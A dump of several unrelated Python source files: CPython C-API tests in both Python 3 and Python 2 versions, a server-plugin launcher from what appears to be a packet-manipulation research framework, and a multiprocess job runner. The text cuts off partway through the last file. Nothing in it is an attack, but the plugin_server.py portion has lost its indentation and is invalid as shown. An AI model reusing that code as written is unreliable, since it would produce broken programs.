                import _testcapi
                from test import support
                with support.SuppressCrashReport():
                    _testcapi.return_result_with_error()
            """)
            rc, out, err = assert_python_failure('-c', code)
            self.assertRegex(err.replace(b'\r', b''),
                             br'Fatal Python error: a function returned a '
                             br'result with an error set\n'
                             br'ValueError\n'
                             br'\n'
                             br'The above exception was the direct cause '
                             br'of the following exception:\n'
                             br'\n'
                             br'SystemError: <built-in '
                             br'function return_result_with_error> '
                             br'returned a result with an error set\n'
                             br'\n'
                             br'Current thread.*:\n'
                             br' File .*, line 6 in <module>')
        else:
            with self.assertRaises(SystemError) as cm:
                _testcapi.return_result_with_error()
            self.assertRegex(str(cm.exception),
                             'return_result_with_error.* '
                             'returned a result with an error set')
    def test_buildvalue_N(self):
        _testcapi.test_buildvalue_N()
    def test_set_nomemory(self):
        code = """if 1:
            import _testcapi
            class C(): pass
            # The first loop tests both functions and that remove_mem_hooks()
            # can be called twice in a row. The second loop checks a call to
            # set_nomemory() after a call to remove_mem_hooks(). The third
            # loop checks the start and stop arguments of set_nomemory().
            for outer_cnt in range(1, 4):
                start = 10 * outer_cnt
                for j in range(100):
                    if j == 0:
                        if outer_cnt != 3:
                            _testcapi.set_nomemory(start)
                        else:
                            _testcapi.set_nomemory(start, start + 1)
                    try:
                        C()
                    except MemoryError as e:
                        if outer_cnt != 3:
                            _testcapi.remove_mem_hooks()
                        print('MemoryError', outer_cnt, j)
                        _testcapi.remove_mem_hooks()
                        break
        """
        rc, out, err = assert_python_ok('-c', code)
        self.assertIn(b'MemoryError 1 10', out)
        self.assertIn(b'MemoryError 2 20', out)
        self.assertIn(b'MemoryError 3 30', out)
    def test_mapping_keys_values_items(self):
        class Mapping1(dict):
            def keys(self):
                return list(super().keys())
            def values(self):
                return list(super().values())
            def items(self):
                return list(super().items())
        class Mapping2(dict):
            def keys(self):
                return tuple(super().keys())
            def values(self):
                return tuple(super().values())
            def items(self):
                return tuple(super().items())
        dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
        for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
                        dict_obj, OrderedDict(dict_obj),
                        Mapping1(dict_obj), Mapping2(dict_obj)]:
            self.assertListEqual(_testcapi.get_mapping_keys(mapping),
                                 list(mapping.keys()))
            self.assertListEqual(_testcapi.get_mapping_values(mapping),
                                 list(mapping.values()))
            self.assertListEqual(_testcapi.get_mapping_items(mapping),
                                 list(mapping.items()))
    def test_mapping_keys_values_items_bad_arg(self):
        self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
        self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
        self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
        class BadMapping:
            def keys(self):
                return None
            def values(self):
                return None
            def items(self):
                return None
        bad_mapping = BadMapping()
        self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
        self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
        self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
class TestPendingCalls(unittest.TestCase):
    """Tests for pending-call dispatch via _testcapi._pending_threadfunc."""
    def pendingcalls_submit(self, l, n):
        def callback():
            #this function can be interrupted by thread switching so let's
            #use an atomic operation
            l.append(None)
        for i in range(n):
            time.sleep(random.random()*0.02) #0.01 secs on average
            #try submitting callback until successful.
            #rely on regular interrupt to flush queue if we are
            #unsuccessful.
            while True:
                if _testcapi._pending_threadfunc(callback):
                    break;
    def pendingcalls_wait(self, l, n, context = None):
        #now, stick around until l[0] has grown to 10
        count = 0;
        while len(l) != n:
            #this busy loop is where we expect to be interrupted to
            #run our callbacks. Note that callbacks are only run on the
            #main thread
            if False and support.verbose:
                print("(%i)"%(len(l),),)
            for i in range(1000):
                a = i*i
            if context and not context.event.is_set():
                continue
            count += 1
            self.assertTrue(count < 10000,
                "timeout waiting for %i callbacks, got %i"%(n, len(l)))
        if False and support.verbose:
            print("(%i)"%(len(l),))
    def test_pendingcalls_threaded(self):
        #do every callback on a separate thread
        n = 32 #total callbacks
        threads = []
        class foo(object):pass
        context = foo()
        context.l = []
        context.n = 2 #submits per thread
        context.nThreads = n // context.n
        context.nFinished = 0
        context.lock = threading.Lock()
        context.event = threading.Event()
        threads = [threading.Thread(target=self.pendingcalls_thread,
                                    args=(context,))
                   for i in range(context.nThreads)]
        with support.start_threads(threads):
            self.pendingcalls_wait(context.l, n, context)
    def pendingcalls_thread(self, context):
        try:
            self.pendingcalls_submit(context.l, context.n)
        finally:
            with context.lock:
                context.nFinished += 1
                nFinished = context.nFinished
                if False and support.verbose:
                    print("finished threads: ", nFinished)
        if nFinished == context.nThreads:
            context.event.set()
    def test_pendingcalls_non_threaded(self):
        #again, just using the main thread, likely they will all be dispatched at
        #once. It is ok to ask for too many, because we loop until we find a slot.
        #the loop can be interrupted to dispatch.
        #there are only 32 dispatch slots, so we go for twice that!
        l = []
        n = 64
        self.pendingcalls_submit(l, n)
        self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
    """Check that a subinterpreter gets its own sys.modules and builtins."""
    def test_subinterps(self):
        import builtins
        r, w = os.pipe()
        code = """if 1:
            import sys, builtins, pickle
            with open({:d}, "wb") as f:
                pickle.dump(id(sys.modules), f)
                pickle.dump(id(builtins), f)
            """.format(w)
        with open(r, "rb") as f:
            ret = support.run_in_subinterp(code)
            self.assertEqual(ret, 0)
            self.assertNotEqual(pickle.load(f), id(sys.modules))
            self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
    def test(self):
        # Regression check: _testcapi.argparsing is expected to return 1
        # for these two string arguments.
        self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
    """Tests that drive the Programs/_testembed embedding executable."""
    def setUp(self):
        here = os.path.abspath(__file__)
        basepath = os.path.dirname(os.path.dirname(os.path.dirname(here)))
        exename = "_testembed"
        if sys.platform.startswith("win"):
            ext = ("_d" if "_d" in sys.executable else "") + ".exe"
            exename += ext
            exepath = os.path.dirname(sys.executable)
        else:
            exepath = os.path.join(basepath, "Programs")
        self.test_exe = exe = os.path.join(exepath, exename)
        if not os.path.exists(exe):
            self.skipTest("%r doesn't exist" % exe)
        # This is needed otherwise we get a fatal error:
        # "Py_Initialize: Unable to get the locale encoding
        # LookupError: no codec search functions registered: can't find encoding"
        self.oldcwd = os.getcwd()
        os.chdir(basepath)
    def tearDown(self):
        os.chdir(self.oldcwd)
    def run_embedded_interpreter(self, *args, env=None):
        """Runs a test in the embedded interpreter"""
        cmd = [self.test_exe]
        cmd.extend(args)
        if env is not None and sys.platform == 'win32':
            # Windows requires at least the SYSTEMROOT environment variable to
            # start Python.
            env = env.copy()
            env['SYSTEMROOT'] = os.environ['SYSTEMROOT']
        p = subprocess.Popen(cmd,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             universal_newlines=True,
                             env=env)
        (out, err) = p.communicate()
        self.assertEqual(p.returncode, 0,
                         "bad returncode %d, stderr is %r" %
                         (p.returncode, err))
        return out, err
    def run_repeated_init_and_subinterpreters(self):
        # Generator: yields one parsed 5-entry run per init/fini pass.
        out, err = self.run_embedded_interpreter("repeated_init_and_subinterpreters")
        self.assertEqual(err, "")
        # The output from _testembed looks like this:
        # --- Pass 0 ---
        # interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
        # interp 1 <0x1d4f690>, thread state <0x1d35350>: id(modules) = 139650431165784
        # interp 2 <0x1d5a690>, thread state <0x1d99ed0>: id(modules) = 139650413140368
        # interp 3 <0x1d4f690>, thread state <0x1dc3340>: id(modules) = 139650412862200
        # interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
        # --- Pass 1 ---
        # ...
        interp_pat = (r"^interp (\d+) <(0x[\dA-F]+)>, "
                      r"thread state <(0x[\dA-F]+)>: "
                      r"id\(modules\) = ([\d]+)$")
        Interp = namedtuple("Interp", "id interp tstate modules")
        numloops = 0
        current_run = []
        for line in out.splitlines():
            if line == "--- Pass {} ---".format(numloops):
                self.assertEqual(len(current_run), 0)
                if support.verbose:
                    print(line)
                numloops += 1
                continue
            self.assertLess(len(current_run), 5)
            match = re.match(interp_pat, line)
            if match is None:
                self.assertRegex(line, interp_pat)
            # Parse the line from the loop. The first line is the main
            # interpreter and the 3 afterward are subinterpreters.
            interp = Interp(*match.groups())
            if support.verbose:
                print(interp)
            self.assertTrue(interp.interp)
            self.assertTrue(interp.tstate)
            self.assertTrue(interp.modules)
            current_run.append(interp)
            # The last line in the loop should be the same as the first.
            if len(current_run) == 5:
                main = current_run[0]
                self.assertEqual(interp, main)
                yield current_run
                current_run = []
    def test_subinterps_main(self):
        for run in self.run_repeated_init_and_subinterpreters():
            main = run[0]
            self.assertEqual(main.id, '0')
    def test_subinterps_different_ids(self):
        for run in self.run_repeated_init_and_subinterpreters():
            main, *subs, _ = run
            mainid = int(main.id)
            for i, sub in enumerate(subs):
                self.assertEqual(sub.id, str(mainid + i + 1))
    def test_subinterps_distinct_state(self):
        for run in self.run_repeated_init_and_subinterpreters():
            main, *subs, _ = run
            if '0x0' in main:
                # XXX Fix on Windows (and other platforms): something
                # is going on with the pointers in Programs/_testembed.c.
                # interp.interp is 0x0 and interp.modules is the same
                # between interpreters.
                raise unittest.SkipTest('platform prints pointers as 0x0')
            for sub in subs:
                # A new subinterpreter may have the same
                # PyInterpreterState pointer as a previous one if
                # the earlier one has already been destroyed. So
                # we compare with the main interpreter. The same
                # applies to tstate.
                self.assertNotEqual(sub.interp, main.interp)
                self.assertNotEqual(sub.tstate, main.tstate)
                self.assertNotEqual(sub.modules, main.modules)
    def test_forced_io_encoding(self):
        # Checks forced configuration of embedded interpreter IO streams
        env = dict(os.environ, PYTHONIOENCODING="utf-8:surrogateescape")
        out, err = self.run_embedded_interpreter("forced_io_encoding", env=env)
        if support.verbose > 1:
            print()
            print(out)
            print(err)
        expected_stream_encoding = "utf-8"
        expected_errors = "surrogateescape"
        expected_output = '\n'.join([
            "--- Use defaults ---",
            "Expected encoding: default",
            "Expected errors: default",
            "stdin: {in_encoding}:{errors}",
            "stdout: {out_encoding}:{errors}",
            "stderr: {out_encoding}:backslashreplace",
            "--- Set errors only ---",
            "Expected encoding: default",
            "Expected errors: ignore",
            "stdin: {in_encoding}:ignore",
            "stdout: {out_encoding}:ignore",
            "stderr: {out_encoding}:backslashreplace",
            "--- Set encoding only ---",
            "Expected encoding: latin-1",
            "Expected errors: default",
            "stdin: latin-1:{errors}",
            "stdout: latin-1:{errors}",
            "stderr: latin-1:backslashreplace",
            "--- Set encoding and errors ---",
            "Expected encoding: latin-1",
            "Expected errors: replace",
            "stdin: latin-1:replace",
            "stdout: latin-1:replace",
            "stderr: latin-1:backslashreplace"])
        expected_output = expected_output.format(
                            in_encoding=expected_stream_encoding,
                            out_encoding=expected_stream_encoding,
                            errors=expected_errors)
        # This is useful if we ever trip over odd platform behaviour
        self.maxDiff = None
        self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
    """Consistency checks between getargs.c convertsimple() and skipitem()."""
    def test_skipitem(self):
        """
        If this test failed, you probably added a new "format unit"
        in Python/getargs.c, but neglected to update our poor friend
        skipitem() in the same file. (If so, shame on you!)
        With a few exceptions**, this function brute-force tests all
        printable ASCII*** characters (32 to 126 inclusive) as format units,
        checking to see that PyArg_ParseTupleAndKeywords() return consistent
        errors both when the unit is attempted to be used and when it is
        skipped. If the format unit doesn't exist, we'll get one of two
        specific error messages (one for used, one for skipped); if it does
        exist we *won't* get that error--we'll get either no error or some
        other error. If we get the specific "does not exist" error for one
        test and not for the other, there's a mismatch, and the test fails.
        ** Some format units have special funny semantics and it would
        be difficult to accommodate them here. Since these are all
        well-established and properly skipped in skipitem() we can
        get away with not testing them--this test is really intended
        to catch *new* format units.
        *** Python C source files must be ASCII. Therefore it's impossible
        to have non-ASCII format units.
        """
        empty_tuple = ()
        tuple_1 = (0,)
        dict_b = {'b':1}
        keywords = ["a", "b"]
        for i in range(32, 127):
            c = chr(i)
            # skip parentheses, the error reporting is inconsistent about them
            # skip 'e', it's always a two-character code
            # skip '|' and '$', they don't represent arguments anyway
            if c in '()e|$':
                continue
            # test the format unit when not skipped
            format = c + "i"
            try:
                _testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
                    format, keywords)
                when_not_skipped = False
            except SystemError as e:
                s = "argument 1 (impossible<bad format char>)"
                when_not_skipped = (str(e) == s)
            except TypeError:
                when_not_skipped = False
            # test the format unit when skipped
            optional_format = "|" + format
            try:
                _testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
                    optional_format, keywords)
                when_skipped = False
            except SystemError as e:
                s = "impossible<bad format char>: '{}'".format(format)
                when_skipped = (str(e) == s)
            message = ("test_skipitem_parity: "
                "detected mismatch between convertsimple and skipitem "
                "for format unit '{}' ({}), not skipped {}, skipped {}".format(
                    c, i, when_skipped, when_not_skipped))
            self.assertIs(when_skipped, when_not_skipped, message)
    def test_parse_tuple_and_keywords(self):
        # Test handling errors in the parse_tuple_and_keywords helper itself
        self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
                          (), {}, 42, [])
        self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
                          (), {}, '', 42)
        self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
                          (), {}, '', [''] * 42)
        self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
                          (), {}, '', [42])
    def test_bad_use(self):
        # Test handling invalid format and keywords in
        # PyArg_ParseTupleAndKeywords()
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (1,), {}, '||O', ['a'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (1, 2), {}, '|O|O', ['a', 'b'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {'a': 1}, '$$O', ['a'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {'a': 1, 'b': 2}, '$O$O', ['a', 'b'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {'a': 1}, '$|O', ['a'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {'a': 1, 'b': 2}, '$O|O', ['a', 'b'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (1,), {}, '|O', ['a', 'b'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (1,), {}, '|OO', ['a'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {}, '|$O', [''])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {}, '|OO', ['a', ''])
    def test_positional_only(self):
        parse = _testcapi.parse_tuple_and_keywords
        parse((1, 2, 3), {}, 'OOO', ['', '', 'a'])
        parse((1, 2), {'a': 3}, 'OOO', ['', '', 'a'])
        with self.assertRaisesRegex(TypeError,
                r'function takes at least 2 positional arguments \(1 given\)'):
            parse((1,), {'a': 3}, 'OOO', ['', '', 'a'])
        parse((1,), {}, 'O|OO', ['', '', 'a'])
        with self.assertRaisesRegex(TypeError,
                r'function takes at least 1 positional arguments \(0 given\)'):
            parse((), {}, 'O|OO', ['', '', 'a'])
        parse((1, 2), {'a': 3}, 'OO$O', ['', '', 'a'])
        with self.assertRaisesRegex(TypeError,
                r'function takes exactly 2 positional arguments \(1 given\)'):
            parse((1,), {'a': 3}, 'OO$O', ['', '', 'a'])
        parse((1,), {}, 'O|O$O', ['', '', 'a'])
        with self.assertRaisesRegex(TypeError,
                r'function takes at least 1 positional arguments \(0 given\)'):
            parse((), {}, 'O|O$O', ['', '', 'a'])
        with self.assertRaisesRegex(SystemError, r'Empty parameter name after \$'):
            parse((1,), {}, 'O|$OO', ['', '', 'a'])
        with self.assertRaisesRegex(SystemError, 'Empty keyword'):
            parse((1,), {}, 'O|OO', ['', 'a', ''])
class TestThreadState(unittest.TestCase):
    """Thread-state tests driven via _testcapi._test_thread_state."""
    @support.reap_threads
    def test_thread_state(self):
        # some extra thread-state tests driven via _testcapi
        def target():
            idents = []
            def callback():
                idents.append(threading.get_ident())
            _testcapi._test_thread_state(callback)
            a = b = callback
            time.sleep(1)
            # Check our main thread is in the list exactly 3 times.
            self.assertEqual(idents.count(threading.get_ident()), 3,
                             "Couldn't find main thread correctly in the list")
        # Run once on the current thread and once on a fresh thread.
        target()
        t = threading.Thread(target=target)
        t.start()
        t.join()
class Test_testcapi(unittest.TestCase):
    """Run every self-contained test_* function exported by _testcapi."""
    def test__testcapi(self):
        if support.verbose:
            print()
        for name in dir(_testcapi):
            if not name.startswith('test_'):
                continue
            with self.subTest("internal", name=name):
                if support.verbose:
                    print(f" {name}", flush=True)
                test = getattr(_testcapi, name)
                test()
class PyMemDebugTests(unittest.TestCase):
    """Checks for the PYTHONMALLOC debug hooks; subclasses vary the allocator."""
    PYTHONMALLOC = 'debug'
    # '0x04c06e0' or '04C06E0'
    PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
    def check(self, code):
        # Run `code` in a child interpreter with the configured allocator and
        # return its decoded stderr (the expected fatal-error report).
        with support.SuppressCrashReport():
            out = assert_python_failure('-c', code,
                                        PYTHONMALLOC=self.PYTHONMALLOC)
            stderr = out.err
        return stderr.decode('ascii', 'replace')
    def test_buffer_overflow(self):
        out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
        regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
                 r" 16 bytes originally requested\n"
                 r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
                 r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
                 r" at tail\+0: 0x78 \*\*\* OUCH\n"
                 r" at tail\+1: 0xfb\n"
                 r" at tail\+2: 0xfb\n"
                 r" .*\n"
                 r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
                 r" Data at p: cb cb cb .*\n"
                 r"\n"
                 r"Fatal Python error: bad trailing pad byte")
        regex = regex.format(ptr=self.PTR_REGEX)
        regex = re.compile(regex, flags=re.DOTALL)
        self.assertRegex(out, regex)
    def test_api_misuse(self):
        out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
        regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
                 r" 16 bytes originally requested\n"
                 r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
                 r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
                 r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
                 r" Data at p: cb cb cb .*\n"
                 r"\n"
                 r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
        regex = regex.format(ptr=self.PTR_REGEX)
        self.assertRegex(out, regex)
    def check_malloc_without_gil(self, code):
        out = self.check(code)
        expected = ('Fatal Python error: Python memory allocator called '
                    'without holding the GIL')
        self.assertIn(expected, out)
    def test_pymem_malloc_without_gil(self):
        # Debug hooks must raise an error if PyMem_Malloc() is called
        # without holding the GIL
        code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
        self.check_malloc_without_gil(code)
    def test_pyobject_malloc_without_gil(self):
        # Debug hooks must raise an error if PyObject_Malloc() is called
        # without holding the GIL
        code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
        self.check_malloc_without_gil(code)
class PyMemMallocDebugTests(PyMemDebugTests):
    # Same debug-hook checks, layered over the raw 'malloc' allocator.
    PYTHONMALLOC = 'malloc_debug'
# Only meaningful when CPython was configured with pymalloc enabled.
@unittest.skipUnless(sysconfig.get_config_var('WITH_PYMALLOC') == 1,
                     'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
    PYTHONMALLOC = 'pymalloc_debug'
# An empty PYTHONMALLOC selects the build's default allocator; the debug
# hooks are only installed by default in a Py_DEBUG build.
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
    # test default allocator of Python compiled in debug mode
    PYTHONMALLOC = ''
# Allow running this test file directly.
if __name__ == "__main__":
    unittest.main()
|
plugin_server.py | import argparse
import threading
import multiprocessing
import os
import psutil
import socket
import sys
import time
BASEPATH = os.path.dirname(os.path.abspath(__file__))
PROJECT_ROOT = os.path.dirname(BASEPATH)
sys.path.append(PROJECT_ROOT)
import actions.sniffer
import engine
from plugins.plugin import Plugin
class ServerPlugin(Plugin):
"""
Defines superclass for each application plugin.
"""
def __init__(self):
self.enabled = True
self.server_proc = None
self.sniffer = None
self.engine = None
@staticmethod
def get_args(command):
"""
Defines required global args for all plugins
"""
# Do not add a help message; this allows us to collect the arguments from server plugins
parser = argparse.ArgumentParser(description='Server plugin runner', allow_abbrev=False, add_help=False)
parser.add_argument('--test-type', action='store', choices=actions.utils.get_plugins(), default="http", help="plugin to launch")
parser.add_argument('--environment-id', action='store', help="ID of the current environment")
parser.add_argument('--output-directory', action='store', help="Where to output results")
parser.add_argument('--no-engine', action="store_true",
help="Only run the test without the geneva engine")
parser.add_argument('--server-side', action="store_true", help="run the Geneva engine on the server side, not the client")
parser.add_argument('--strategy', action='store', default="", help='strategy to run')
parser.add_argument('--log', action='store', default="debug",
choices=("debug", "info", "warning", "critical", "error"),
help="Sets the log level")
parser.add_argument('--port', action='store', type=int, help='port to run this server on')
parser.add_argument('--external-server', action='store_true', help="use an external server for testing.")
parser.add_argument('--sender-ip', action='store', help="IP address of sending machine, used for NAT")
parser.add_argument('--forward-ip', action='store', help="IP address to forward traffic to")
parser.add_argument('--routing-ip', action='store', help="routing IP for this computer for server-side evaluation.")
parser.add_argument('--public-ip', action='store', help="public facing IP for this computer for server-side evaluation.")
parser.add_argument('--no-wait-for-server', action='store_true', help="disable blocking until the server is bound on a given port")
parser.add_argument('--wait-for-shutdown', action='store_true', help="monitor for the <eid>.shutdown_server flag to shutdown this server.")
args, _ = parser.parse_known_args(command)
return vars(args)
def start(self, args, logger):
"""
Runs this plugin.
"""
logger.debug("Launching %s server" % self.name)
output_path = os.path.join(PROJECT_ROOT, args["output_directory"])
eid = args["environment_id"]
use_engine = not args.get("no_engine", False)
port = args["port"]
server_side = args["server_side"]
log_level = args["log"]
strategy = args.get("strategy", "")
assert port, "Need to specify a port in order to launch a sniffer"
forwarder = {}
# If NAT options were specified to train as a middle box, set up the engine's
# NAT configuration
if args.get("sender_ip"):
assert args.get("forward_ip")
assert args.get("sender_ip")
assert args.get("routing_ip")
forwarder["forward_ip"] = args["forward_ip"]
forwarder["sender_ip"] = args["sender_ip"]
forwarder["routing_ip"] = args["routing_ip"]
pcap_filename = os.path.join(output_path, "packets", eid + "_server.pcap")
# We cannot use the context managers as normal here, as this method must return and let the evaluator continue
# doing its thing. If we used the context managers, they would be cleaned up on method exit.
# Start a sniffer to capture traffic that the plugin generates
self.sniffer = actions.sniffer.Sniffer(pcap_filename, int(port), logger).__enter__()
# Conditionally initialize the engine
self.engine = engine.Engine(port, strategy, server_side=True, environment_id=eid, output_directory=output_path, log_level=args.get("log", "info"), enabled=use_engine, forwarder=forwarder).__enter__()
# Run the plugin
self.server_proc = multiprocessing.Process(target=self.start_thread, args=(args, logger))
self.server_proc.start()
# Create a thread to monitor if we need to
if args.get("wait_for_shutdown"):
threading.Thread(target=self.wait_for_shutdown, args=(args, logger)).start()
# Shortcut wait for server if a plugin has disabled it
if args.get("no_wait_for_server"):
return
# Block until the server has started up
self.wait_for_server(args, logger)
def start_thread(self, args, logger):
    """
    Calls the given run function, designed to be run in a separate process.

    Thin multiprocessing target wrapper; run() is presumably implemented
    by the concrete plugin subclass -- confirm.
    """
    self.run(args, logger)
def wait_for_server(self, args, logger):
    """
    Waits for server to startup - returns when the server port is bound to by the server.

    Polls by trying to bind the port ourselves: while the bind succeeds the
    port is still free (server not up yet); once the bind raises OSError the
    server owns the port and the startup flag file is written.  Gives up
    after max_wait iterations (~15 s) without writing the flag.

    :param args: dict with at least "port", "output_directory", "environment_id"
    :param logger: logger used for status output
    """
    logger.debug("Monitoring for server startup on port %s" % args["port"])
    max_wait = 30
    count = 0
    while count < max_wait:
        if count % 10 == 0:
            logger.debug("Waiting for server port binding")
        # Bind TCP socket: a successful bind means the server has NOT
        # claimed the port yet
        try:
            with socket.socket() as sock:
                sock.bind(('', int(args["port"])))
        except OSError:
            # Port already taken -- the server is up
            break
        time.sleep(0.5)
        count += 1
    else:
        # Loop exhausted without the port ever being taken.
        # BUG FIX: logger.warn is a deprecated alias; use warning().
        logger.warning("Server never seemed to bind to port")
        return
    self.write_startup_file(args, logger)
def write_startup_file(self, args, logger):
    """Signal readiness to the evaluator by touching a flag file on disk."""
    flags_dir = os.path.join(PROJECT_ROOT, args["output_directory"], "flags")
    flag_file = os.path.join(flags_dir, "%s.server_ready" % args["environment_id"])
    # Touch the file -- its existence, not its contents, is the signal
    with open(flag_file, "a"):
        pass
    logger.debug("Server ready.")
def wait_for_shutdown(self, args, logger):
    """
    Checks for the <eid>.server_shutdown flag to shutdown this server.

    Polls the flag file every half second; when it appears, stops the
    sniffer, engine and server process via stop().
    """
    flag_file = os.path.join(PROJECT_ROOT, args["output_directory"], "flags",
                             "%s.server_shutdown" % args["environment_id"])
    # Poll until the evaluator drops the shutdown flag
    while not os.path.exists(flag_file):
        time.sleep(0.5)
    logger.debug("Server for %s shutting down." % args["environment_id"])
    self.stop()
    logger.debug("Server %s stopped." % args["environment_id"])
def stop(self):
    """
    Terminates the given process.

    Exits the engine and sniffer context managers first (they were entered
    manually in start()), then terminates the server process and every
    child process it spawned.
    """
    self.engine.__exit__(None, None, None)
    self.sniffer.__exit__(None, None, None)
    # In order to clean up all the child processes a server may have started,
    # iterate over all of the process children and terminate them
    proc = psutil.Process(self.server_proc.pid)
    for child in proc.children(recursive=True):
        child.terminate()
    proc.terminate()
def punish_fitness(self, fitness, logger):
    """
    Punish fitness.

    Delegates to actions.utils.punish_fitness so engine-related penalties
    are applied to the given fitness value; returns the adjusted fitness.
    """
    return actions.utils.punish_fitness(fitness, logger, self.engine)
def main(command):
    """
    Used to invoke the server plugin from the command line.

    :param command: argv-style list of arguments (without the program name)
    """
    # Must use the superclasses arg parsing first to figure out the plugin to use
    plugin = ServerPlugin.get_args(command)["test_type"]
    # Import that plugin
    mod, cls = actions.utils.import_plugin(plugin, "server")
    # Ask the plugin to parse the args
    plugin_args = cls.get_args(command)
    # Instantiate the plugin
    server_plugin = cls(plugin_args)
    # Define a logger and launch the plugin
    with actions.utils.Logger(plugin_args["output_directory"], __name__, "server", plugin_args["environment_id"], log_level=plugin_args["log"]) as logger:
        server_plugin.start(plugin_args, logger)
# Script entry point: forward CLI arguments (without the program name) to main()
if __name__ == "__main__":
    main(sys.argv[1:])
|
run_multiprocess.py | import os
import argparse
import subprocess
import multiprocessing
# -n controls the number of worker processes to spawn.
parser = argparse.ArgumentParser()
parser.add_argument("-n", type=int, help="number of processes")
args = parser.parse_args()
# Root directory holding the models; one dse_p.py invocation is generated per
# model.  NOTE(review): path and the model count 15625 are hard-coded for a
# specific machine/benchmark -- confirm before reuse.
root = "/mnt/data1/chengdi/nb201/"
cmds = []
for i in range(15625):
    cmds.append("python3 dse_p.py -m {} -i ./cifar10.json -b ./vu9p.json -o {} --parallel -dt 1".format(
        os.path.join(root, "models", f"{i}.model"), os.path.join(root, "dse_dt1", str(i))))
# Bounded queue: the feeder loop below blocks instead of buffering all
# 15625 commands at once.
queue = multiprocessing.Queue(maxsize=args.n)
def _worker(pid, queue):
while 1:
token = queue.get()
if token is None:
break
_, cmd = token
print("Process #{}: CMD: {}".format(pid, cmd))
subprocess.check_call(cmd, shell=True)
print("Process #{} end".format(pid))
# Start the worker pool; each worker pulls commands until it sees the
# None sentinel.  Workers are non-daemonic, so the interpreter waits for
# them at exit.
for pid in range(args.n):
    p = multiprocessing.Process(target=_worker, args=(pid, queue))
    p.start()
# Feed all commands; blocks when the bounded queue is full.
for i_cmd, cmd in enumerate(cmds):
    queue.put((i_cmd, cmd))
# close all the workers
# One sentinel per worker so every process exits its loop.
for _ in range(args.n):
    queue.put(None)
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from __future__ import with_statement
import sys
import time
import random
import unittest
from test import test_support
try:
import thread
import threading
except ImportError:
thread = None
threading = None
import _testcapi
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
    # Exercises _testcapi._pending_threadfunc, which schedules callbacks to
    # be run later by the main interpreter thread.  (Python 2 test module.)

    def pendingcalls_submit(self, l, n):
        # Submit n callbacks; each appends to the shared list l when run.
        def callback():
            #this function can be interrupted by thread switching so let's
            #use an atomic operation
            l.append(None)

        for i in range(n):
            time.sleep(random.random()*0.02) #0.01 secs on average
            #try submitting callback until successful.
            #rely on regular interrupt to flush queue if we are
            #unsuccessful.
            while True:
                if _testcapi._pending_threadfunc(callback):
                    break;

    def pendingcalls_wait(self, l, n, context = None):
        #now, stick around until l[0] has grown to 10
        count = 0;
        while len(l) != n:
            #this busy loop is where we expect to be interrupted to
            #run our callbacks. Note that callbacks are only run on the
            #main thread
            if False and test_support.verbose:
                print "(%i)"%(len(l),),
            # Busy work to give the interpreter a chance to run callbacks
            for i in xrange(1000):
                a = i*i
            # Only count towards the timeout once all submitters finished
            if context and not context.event.is_set():
                continue
            count += 1
            self.assertTrue(count < 10000,
                "timeout waiting for %i callbacks, got %i"%(n, len(l)))
        if False and test_support.verbose:
            print "(%i)"%(len(l),)

    def test_pendingcalls_threaded(self):
        #do every callback on a separate thread
        n = 32 #total callbacks
        threads = []
        class foo(object):pass
        context = foo()
        context.l = []
